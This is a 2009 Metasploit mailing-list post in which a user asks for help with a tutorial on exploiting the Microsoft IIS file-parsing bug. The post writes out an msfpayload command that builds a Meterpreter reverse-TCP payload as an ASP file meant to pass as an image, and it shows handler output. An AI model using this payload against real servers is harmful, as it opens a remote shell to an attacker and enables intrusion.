Metasploit mailing list archives

Microsoft IIS File Parsing bug

From: τ∂υƒιφ * <tas0584 () gmail com>
Date: Thu, 31 Dec 2009 13:38:51 +0530

Hi,

I am trying the "Exploiting Microsoft IIS with Metasploit" I read up
on https://www.blogger.com/comment.g?blogID=25010298&postID=7822358000167530780&pli=1

I have tried the following command

./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8443
R | ./msfencode -t asp -o /root/evil.asp

This generated the evil.asp. I have also done the cat command and then
verified with the file command. I also started the payload handler and
verified the settings to ensure I am not making any mistakes.

I have two things to ask

1) When I take this evil image and host that on IIS 6.0 I get "Page
not found error" , and when I use the same image on IIS 7.0 it
actually renders the page. Why is this so?
2)

msf exploit(handler) > exploit

[*] Started reverse handler on port 8443
[*] Starting the payload handler

I am not getting any shell back. Am I missing something?

Cheers!
TAS